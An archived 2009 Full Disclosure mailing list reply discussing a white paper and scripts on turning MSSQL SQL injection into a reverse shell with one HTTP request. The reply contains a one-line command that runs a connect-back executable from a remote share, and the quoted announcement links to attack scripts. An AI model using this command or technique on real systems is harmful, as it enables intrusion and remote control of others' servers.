Full Disclosure mailing list archives
Re: One Click Ownage [White Paper and Scripts]
From: Fredrick Diggle <fdiggle () gmail com>
Date: Sun, 5 Jul 2009 23:22:22 -0500
Or just 'start \\DiggleSec.com\fredrick\connectback.exe' would have also been acceptable. But Fredrick is sure that your 20 page write-up was fantastically entertaining. On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<ferruh () mavituna com> wrote:
This is a different and more practical approach to get a reverse shell or code execution in SQL Injections (particularly in MSSQL). The idea is simple. Getting a reverse shell from an SQL Injection with one HTTP request without using an extra channel such as TFTP, FTP to upload the initial payload. White paper explains the steps and the details of the attack. Scripts got all the tools you need to create your HTTP request with your own payload. White Paper: http://ferruh.mavituna.com/papers/oneclickownage.pdf Scripts: http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip Presentation (IT Underground 2009): http://www.slideshare.net/fmavituna/one-click-ownage-1660539 Regards, -- http://ferruh.mavituna.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- One Click Ownage [White Paper and Scripts] Ferruh Mavituna (Jul 03)
- Re: One Click Ownage [White Paper and Scripts] Fredrick Diggle (Jul 05)
- Re: One Click Ownage [White Paper and Scripts] T Biehn (Jul 06)
- Re: One Click Ownage [White Paper and Scripts] Fredrick Diggle (Jul 05)